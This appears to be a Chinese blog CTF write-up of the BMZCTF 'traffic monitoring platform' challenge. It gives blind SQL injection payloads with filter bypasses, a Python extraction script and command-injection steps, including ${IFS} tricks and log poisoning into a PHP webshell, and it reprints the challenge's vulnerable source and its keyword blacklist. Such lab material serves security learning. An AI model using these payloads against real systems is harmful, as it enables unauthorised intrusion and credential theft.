BZMCTF:流量监控平台

于 2021-05-01 23:01:47 发布 1144 收藏 3
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/116329405
版权 
http://www.bmzclub.cn/challenges#%E6%B5%81%E9%87%8F%E7%9B%91%E6%8E%A7%E5%B9%B3%E5%8F%B0

在这里插入图片描述
在这里插入图片描述
通过枚举可知存在admin用户,当uname=admin时,发现提示密码错误,当uname!=admin时提示用户名错误。
在这里插入图片描述

在这里插入图片描述
另外存在过滤SQL关键字符
在这里插入图片描述
简单fuzz一下过滤了哪些字符
在这里插入图片描述
首先注释无法使用,可以通过构造字符闭合来绕过
在这里插入图片描述
空格及内联注释也无法使用,可以利用()绕过
在这里插入图片描述
andor&|都被过滤,可以使用同或,虽然mysql只支持notandorxor四种运算符。但是同或的运算逻辑也是可以在mysql中可以用符号!=!表示的。同或的运算逻辑与异或相反

and/&&的逻辑:
1 and 1 == 1
1 and 0 == 0
0 and 1 == 0
0 and 0 == 0

or/||的逻辑:
1 or 1 == 1
1 or 0 == 1
0 or 1 == 1
0 or 0 == 0

同或!=!的逻辑:
1 !=! 1 == 1
1 !=! 0 == 0
0 !=! 1 == 0
0 !=! 0 == 1

异或xor的逻辑:
1 xor 1 == 0
0 xor 1 == 1
1 xor 0 == 1
0 xor 0 == 0

在这里插入图片描述
在这里插入图片描述
这里我们只需要控制中间的表达式值对注入信息的每一位fuzz,进行布尔盲注即可,如下图所示
在这里插入图片描述
当测试注入语句正确时,只返回一条admin的数据,这时候username是正确的,所以返回password错误。当注入测试语句时错误的,则返回username错误,以此作为判断依据。

但是从fuzz的黑名单中已知了,逗号,是被过滤得。得尝试不适用逗号也能截位。
经查阅资料,发现可以使用from x for y的方法来绕过逗号,
在这里插入图片描述
但是有问题的是这里的for也含有or,此类含有or字符的SQL关键字还有information

当mysql版本大于5.6information的绕过就是利用innodb引擎下自带的两张信息表:innodb_index_statsinnodb_table_stats

from x for y没有for一样可以截位,只不过不能一位一位截取罢了
在这里插入图片描述
综上所述即可构造
在这里插入图片描述

uname=admin'!=!(ascii(mid(user()from(-1)))=116)!=!'1&passwd=mochu7

在这里插入图片描述
user()最后一位的ascii码改为不正确时,返回username error
在这里插入图片描述
可以猜测一下user()是不是root@localhost,不过这样就不能用ascii()了,可以用hex()。后面脚本也都是用hex()

uname=admin'!=!(hex(mid(user()from(-14)))='726F6F74406C6F63616C686F7374')!=!'1&passwd=mochu7

在这里插入图片描述
接下来使用Python开始编写盲注脚本

import requests
import string
from binascii import *

allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

burp0_url = "http://www.bmzclub.cn:20351/login.php"
burp0_cookies = {"PHPSESSID": "l9tsv3e1umnp0lk9dahkee5l41", "session": "6bc4a005-f112-45e7-a15d-8b323e5b879d"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://www.bmzclub.cn:20351", "Connection": "close", "Referer": "http://www.bmzclub.cn:20351/", "Upgrade-Insecure-Requests": "1"}

hexdata = ''

for l in range(1,50):
    for s in allstr:
        s = hexlify(bytes(s.encode())).decode().upper()
        payload = "admin'!=!(hex(mid(user()from(-{})))='{}')!=!'1".format(l,s+hexdata)
        burp0_data = {"uname": payload, "passwd": "mochu7"}
        resp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
        if 'password error!!@_@' in resp.text:
            hexdata = s + hexdata
            print(unhexlify(hexdata).decode())
        else:
            continue

查用户名/当前数据库/版本

payload = "admin'!=!(hex(mid(user()from(-{})))='{}')!=!'1".format(l,s+hexdata)

payload = "admin'!=!(hex(mid(database()from(-{})))='{}')!=!'1".format(l,s+hexdata)

payload = "admin'!=!(hex(mid(version()from(-{})))='{}')!=!'1".format(l,s+hexdata)

注入得到的信息如下:

user():	root@localhost

current_database(): ctf

version(): 10.2.26-MariaDB-log

查ctf库中的表名

payload = "admin'!=!(hex(mid((select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name)='ctf')from(-{})))='{}')!=!'1".format(l,s+hexdata)

查询结果显示当前数据库中只有一张admin

接下来无法通过innodb这两张表查到字段的数据了,因为限制太多,如限制了反引号。不确定能否通过盲注查询出字段数据,这里就不继续查询admin表字段数据了,直接就可以通过POST的参数尝试猜测字段名为unamepasswd

如果这里没有过滤*,那就可以直接select * from ctf.admin;

查字段uname的内容

payload = "admin'!=!((select(hex(mid(group_concat(uname)from(-{})))='{}')from(ctf.admin)))!=!'1".format(l,s+hexdata)

只有一个用户admin

继续查字段passwd的内容

payload = "admin'!=!((select(hex(mid(group_concat(passwd)from(-{})))='{}')from(ctf.admin)))!=!'1".format(l,s+hexdata)

在这里插入图片描述
得到用户admin的密码:e10adc3949ba59abbe56e057f20f883e

应该是md5,拿去cmd5查询一下
在这里插入图片描述
。。。。。。。密码就这???????
上面所有的努力就是一个弱口令登陆的的事情???????

唉,早知道就直接尝试弱口令了。不过没关系。毕竟是CTF,能学到的以前不知道的姿势就行,又不是实战渗透。
实战估计早就吐血了。

得到密码后成功登录
在这里插入图片描述
猜测命令执行,没有回显猜测是exec()执行
在这里插入图片描述
命令执行出错有回显
在这里插入图片描述
测试的时候发现,有过滤
在这里插入图片描述
简单fuzz了下发现过滤了ncbashpythonphpwgetftpsh>以及空格等,命令执行绕过,过滤了这些应该很容易就绕过了吧,姿势网上多的很,这里就不赘述了。

另外经过多次测试后发现这里执行命令对错应该是直接判断exec()的返回值,这样的话显示的命令执行对错就没什么用了,有些正确的命令本身没有输出例如cpmv等。而且有些错误的命令执行会输出报错信息,被exec()作为返回值反而回显命令执行成功。

一开始试了下反弹shell,结果试了很多次没成功,也是迷。干脆就用别的办法了。

第一种方法:利用cp将flag直接复制到web目录下

cp${IFS}/flag${IFS}./flag.html

直接访问/admin/flag.html
在这里插入图片描述
第二种方法:利用burp,将shell写在url后面
在这里插入图片描述
Nginx的服务器,默认日志文件地址/var/log/nginx/access.log或者/var/log/nginx/error.log
利用cp将日志文件复制到web目录,后缀为php

cp${IFS}/var/log/nginx/access.log${IFS}mochu7.ph\p

执行完成后,访问http://www.bmzclub.cn:20351/admin/mochu7.php
在这里插入图片描述
成功拿到shell
在这里插入图片描述
有命令执行,操作空间就很大。还有很多别的方法自己去发掘吧。

最后贴一下源码
login.php

<?php
        header("Content-Type:text/html;charset=utf-8");
        error_reporting(E_ERROR);
        define ('PATH_WEB', dirname(__FILE__).'/');
        require_once(dirname(__FILE__).'/include/conf.php');
        require_once(dirname(__FILE__).'/include/fiter.php');
        #var_dump($_SESSION);
        if($_SESSION['flag'] === 1){
                header("location:./admin/");exit;
        }
        #echo $_POST['uname'].'````'.$_POST['passwd'];

        if($_POST['uname'] && $_POST['passwd']){
                $obj = new fiter();
                $uname = $obj->sql_clean($_POST['uname']);
                $passwd = md5($_POST['passwd']);
                $query="SELECT * FROM admin WHERE uname='".$uname."'";
                $result=mysql_query($query);
                #var_dump($result);
                if ($row = mysql_fetch_array($result)){
                        #print_r($row);echo "\n\r<br/>";
            if ($row['passwd']===$passwd){
                                $_SESSION['flag'] = 1;
                                #echo $_SESSION['flag'];
                                header("location:./admin/");exit();
                        }
            else{
                                echo "<script> alert('password error!!@_@');parent.location.href='index.php'; </script>"; exit();
            }
        }
                else{
                        echo "<script> alert('username error!!@_@');parent.location.href='index.php'; </script>"; exit();
                }

        }
        else {
                echo "<script> alert('username and password must have a value!!@_@');parent.location.href='index.php'; </script>"; exit();
        }
?>

filter.php

<?php
class fiter{
        var $str;
        var $order;

        function sql_clean($str){
                if(is_array($str)){
                        echo "<script> alert('not array!!@_@');parent.location.href='index.php'; </script>";exit;
                }
                $filter = "/ |\*|#|,|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i";

        //由于在mysql中认为 %a0 也是空格,所以这里也需要过滤,
                //在这里做了修改,添加 %a0

                if(preg_match($filter,$str)){
                        echo "<script> alert('illegal character!!@_@');parent.location.href='index.php'; </script>";exit;
                }else if(strrpos($str,urldecode("%00"))){
                        echo "<script> alert('illegal character!!@_@');parent.location.href='index.php'; </script>";exit;
                }
                return $this->str=$str;
        }

        function ord_clean($ord){
                $filter = " |bash|perl|nc|java|php|>|>>|wget|ftp|python|sh";
                if (preg_match("/".$filter."/i",$ord) == 1){
                        return $this->order = "";
                }
                return $this->order = $ord;
        }
?>

admin/index.php

<?php
header("Content-Type:text/html;charset=utf-8");
$o = new fiter();
$a = $o->ord_clean($_POST['ord']);
if($a){
        if(exec($a))echo '命令执行成功!!';
        else echo "命令执行出错!!";
}else echo "想干啥呢~_~!!"
?>
末初mochu7
关注
  • 5
    点赞
  • 3
    收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
BMZCTF SSRFME 详解
u013797594的博客
07-04 434
BMZCTF ssrfme详解 题目: 打开题目直接是PHP代码,阅读代码:首先要求传入get参数file和path,file会直接赋值给$url,path会拼接upload,如果$path里面有…那么就会终止执行。$url如果以http://127.0.0.1/开头,则通过file_get_contents($url)读取内容,然后通过file_put_contents()写入到$path中,并且通过echo输出"console.log($path update successed!)" ,$path
BMZCTF:memory
末初 · mochu7
12-13 763
http://bmzclub.cn/challenges#memory 题目描述.txt 分析内存镜像,破解管理员的登录密码,flag为明文密码的MD5值 把内存中所有用户的hash全部dump出来 存为文件,使用john进行爆破 得到Administrator账户密码:12345678 PS C:\Users\Administrator> php -r "var_dump(md5('12345678'));" Command line code:1: string(32) "25d55a
BMZCTF Web up
qq_26243045的博客
01-14 235
打开页面。 发现没有什么有用的信息,查看源代码也一样。 于是进行目录扫描: 发现了两个页面。分别打开。 index.html 无用。 upload.html: 是一个文件上传点。 先尝试上传正常图片: 可以看到,文件的临时目录和文件上传后的存储位置。 查看上传后的文件: 可以看到,是以代码的形式显示出来,而不是图片。 也就是说我们可以上传图片马来执行命令。 上传一个php文件: 多次尝试,发现是白名单过滤。而且文件内容还会被重写。我们就想到了二次渲染。
BMZCTF 网鼎杯 2018 minified
qq_26243045的博客
01-06 168
下载附件,为一个压缩包,打开后是一张图片。 用010editor打开,没有什么发现。 用Stegsolve打开,分离出alpha的0通道、red的0通道、green的0通道和blue的0通道。两两相互异或,最后发现alpha的0通道与green的0通道异或,就能看到flag: flag{7bb6db9f-d2eb-4e69-8dee-0002ce1e07f9} ...
BMZCTF misc1
qq_61768489的博客
04-02 1623
真正的CTFer 010修改图片高度,steg查看更清晰 解不开的秘密 word加密 文件给了16密文 ,转ASCII后继续转base64, 得到数据 [HKEY_CURRENT_USER\Software\RealVNC\VNCViewer4\MRU] "00"="127.0.0.1" "Order"=hex:00,01 "01"="127.0.0.1:5900" [HKEY_CURRENT_USER\Software\RealVNC\WinVNC4] "Password"=hex:
[BZMCTF]综合渗透部分 writeup
ShenZ的博客
01-10 3501
[BZMCTF]综合渗透部分 writeup 靶场:http://www.bmzclub.cn/challenges 伟大宝宝的宝藏 1.后台getshell 2.suid提权 sqlguncms 1.玩玩搜索框sql注入 2.后台登陆+容易文件读取 3.后台文件上传getshell 4.XSS ThinkPHP 1.TP5命令执行 2.后台登陆 3.Phar反序列化漏洞 简历系统 zblog
[wp]bmzclub几道题的writeup
最新发布
小飒的博客
07-03 601
边刷题,边写wp flag{Fourbase123}-… .---- -… -… -… …-- --… …- -… -… --… -… …-- .---- --… …-- …— --… --… …- … …-. --… …-- …-- ----- … …-. …-- …-- …-- …- …-- … --… ----. --… -… 61666374667B317327745F73305F333435797D afctf{1s’t_s0_345y}https://atool.vip/corevalue/ H
BMZCLUB-WEB_ezeval
qq_24033605的博客
04-10 116
WEB_ezeval 打开得到一段PHP代码。 简单分析一下, 1.提交的方式为POST 2.注入点为cmd 3.绕过黑名单 应该是通过cmd命令打开/flag文件。但是system被列入了黑名单。 我们使用点绕过的方式。在PHP中,点符号是连接符的意思,相当于其他语言中的+。 这里构造payload为: cmd=(s.y.s.t.e.m)(‘dir’); ...
BMZCTF:掘地三尺
末初 · mochu7
01-23 3296
http://bmzclub.cn/challenges#%E6%8E%98%E5%9C%B0%E4%B8%89%E5%B0%BA juedisanchi.doc打开隐藏文字,全选切换颜色 第一部分flag flag{real_ 复制这串字符,得到如下 在底部发现jpg文件结尾FF D9 但是这里复制出的文件头却没有jpg文件头FF D8,将juedisanchi.doc修改后缀为zip,解压,然后在juedisanchi\word\document.xml中找到前面的文件头 得到如下的jpg
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习
break_cat的博客
11-17 1403
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习 背景:上周末参加了BMZCTF的渗透测试公开赛,比赛是解BMZCTF靶场中综合渗透的一道题,比赛后官方发了WP,跟着做了一遍,出现了一些问题,写出来抛砖引玉,求指导。 思路:1.官方预期解法(这……我做出来的和解法效果不一样,求大佬指点)            2.非预期解法——广州航海学院 HhhM(成功,感谢HhhM大佬的思路,学习了) &nb
第一届BMZCTF公开赛-WEB-Writeup
末初 · mochu7
12-30 3463
文章目录ezevalezphppenetrationBMZ_Market 前言 首先恭喜白帽子社区团队成功举办第一届BMZCTF公开赛,我是本次比赛MISC赛题Snake、Tiga的出题人末初 以下是我对于的这次BMZCTF公开赛的WEB赛题的一些Writeup,如果有什么写的不对的还请师傅们留言斧正 ezeval <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_li
BMZCTF-MISC(一) WriteUp
Crazy198410的博客
11-15 620
文章目录MISC0x01 签到题0x02 2018 HEBTUCTF 签到题0x03 2018 HEBTUCTF 你可能需要一个wireshark2018 护网杯 迟来的签到题 MISC http://www.bmzclub.cn/challenges 解密 0x01 签到题 关注公众号:白帽子社区,回复关键字:BMZCTF 获取flag 0x02 2018 HEBTUCTF 签到题 下载压缩包。是个名为zip的文件,没有后缀名。用010editor打开,看下文件头部: 发现是个压缩包,添加后缀.zi
BMZCTF CISCN_2019_WEB_1
qq_26243045的博客
11-26 265
首先注册一个用户并登录,发现可以上传和下载文件但是后缀只允许上传图片格式,通过对下载文件进行测试发现存在任意文件下载漏洞。 download.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die(); } if (!isset($_POST['filename'])) { die(); } include "class.php"
pck处理工具源码_我是如何阅读TF源码的——方法论
weixin_39822184的博客
12-01 93
在TensorFlow这个脚手架上,无论是做性能优化、联调上线,还是在功能上做debug,都不可避免要涉及到阅读和梳理源码。源码阅读,这是一个令不少人恐惧的事情。这其中,不乏建模能力十分优秀的算法工程师们。又或者,他们怀着“搞算法不应该碰底层源码”的心态。这其实,也是以此作为逃避的借口罢了。“算法工程师”中的“算法”是个修饰成分,归根结底还是个工程师,工程师写代码碰源码乃是职责所在。恐惧...
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 687
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
BMZCTF:真正的CTFer
末初 · mochu7
12-13 1186
http://bmzclub.cn/challenges#%E7%9C%9F%E6%AD%A3%E7%9A%84CTFer 修改了图片宽高,通过脚本爆破CRC还原下图片的原始的宽高 import struct import zlib def hexStr2bytes(s): b = b"" for i in range(0,len(s),2): temp = s[i:i+2] b +=struct.pack("B",int(temp,16))
BMZCTF:宝宝
末初 · mochu7
01-22 398
http://bmzclub.cn/challenges#%E5%AE%9D%E5%AE%9D 3.png binwalk分析,发现附加内容,foremost分离 分离出来的压缩包有密码,根据题目名字尝试使用babybaby 成功解开压缩包,readme.txt PS C:\Users\Administrator\Downloads> php -r "var_dump(base64_decode('56a75oiQ5Yqf5Y+q5beu5LiA5q2l5LqGLi4uLg=='));" C
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
qq_51550750的博客
01-29 8308
CTF刷题网站汇总(包括本地可以自己搭建的) CTF刷题平台汇总(欢迎各位师傅们补充) 第一个当然是CTFshow啦!https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪
第七届swpu-ctf-web的writeup
dengzhasong7076的博客
10-29 375
web100 一个上传包含题目:phar可以使用相对路径,zip好像需要绝对路径。 web200-3 拿到web100的shell后,是tip里面提示又tomcat,通过 ps -aux 看到tomcat的网站目录,上传一个shell后就是一个tomcat权限。 然后用国庆期间出来的一个tomcat提权,网上都有一个坑点...就是sh里面油\r字符。 sed -i 's/\r$//' x...
BMZCTF 真正的CTFer
qq_26243045的博客
11-29 953
下载附件为一张图片 修改高度: 可以看到下面还有一张图片 将图片放大可以看到flag: 仔细看能看到flag flag{d2b5543c2f8aa8229057872dd85ce5a9}

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值